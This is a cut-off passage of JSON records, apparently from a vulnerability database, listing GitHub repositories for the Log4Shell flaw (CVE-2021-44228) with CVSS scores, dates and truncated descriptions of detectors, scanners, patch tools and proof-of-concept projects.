tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-18T09:16:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-22T13:16:14", "id": "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:49", "description": "# CVE-2021-44228\nMass recognition tool for CVE-2021-44228\n\n## ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:25:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:39", "id": "D2602292-4969-564A-915E-2EFC6661FA35", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:08", "description": "# Log4j-Checker\nThis repository contains scripts that can help i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:11:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T15:16:18", "id": "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:10", "description": "# CVE-2021-44228 \n\n\n> \u3053\u3063\u3061\u306e\u304a\u8a71\u306e\u65b9\u304c\u3088\u308a\u5b9f\u7528\u6027\u304c\u3042\u308b\u3068\u601d\u3044\u307e\u3059(\u6ce3)[christophetd/lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T23:37:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T01:11:19", "id": "11719BED-E629-5C79-944E-7E40BBFC460C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:08", "description": "# docker-log4shell\n\nSimple Go app / Docker image for playing wit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T13:19:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T13:23:50", "id": "0E43C674-363B-53C2-8686-6F412A995AF4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:11:30", "description": "# Cloud One - Workload Security Log4Shell\nThis repo contains a q...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T03:20:25", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:07:45", "id": "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-06-24T10:05:34", "description": "# Log4j-CVE-2021-44228 detector scanner playbook\n\n[![CI](https:/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T22:14:24", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-24T08:08:12", "id": "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-10T00:16:07", "description": "# `log4j-remediation-tools`\n\n> Tools for finding and reproducing...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T21:47:04", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-08-09T21:35:25", "id": "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:32", "description": "# log4shell4shell\nLog4j - Multitool. Find &amp; fix possible CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T23:13:09", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-23T23:26:29", "id": "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T20:08:57", "description": "# CVE-2021-44228\n\nAn attacker who can control log messages or lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:03:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T17:53:14", "id": "30C6DF99-400E-539F-AA8D-39E7407F4796", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:30:39", "description": "# Log4NoShell\nA Java Agent that disables Apache Log4J's JNDI Loo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:35", "id": "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:12", "description": "# Searchable Log4j database\n Searchable page for [CISA Log4j (CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T03:37:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-17T00:21:21", "id": "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:20:55", "description": "# log4j-shell-poc\nA Proof-Of-Concept for the recently found CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-21T07:43:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-21T09:04:17", "id": "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T15:06:25", "description": "# log4j-fuzzer\n## For Single Target \n```bash\nchmod +x log4j\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T00:28:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-01T12:41:00", "id": "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:38", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:11", "description": "# CVE-2021-44228-Demo\n\nThis project for prove and testing zero-d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T04:09:02", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T07:13:10", "id": "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:04", "description": "# Log4j Updater\n\nWith the inevitable need to update the famous J...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T04:08:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T17:25:55", "id": "4288177C-C609-5D55-A845-D6785929AB4D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:20", "description": "# Vulnerable application\n\nThis repository contains a Spring Boot...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T20:39:44", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T10:57:33", "id": "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T14:09:25", "description": "# Spring Boot Log4j - CVE-2021-44228\n\nThe Log4Shell vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:50:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T12:50:40", "id": "C7EE8D86-B287-50F5-B8C2-05E11E510900", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-06-20T22:26:14", "description": "### Usage...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T09:52:36", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 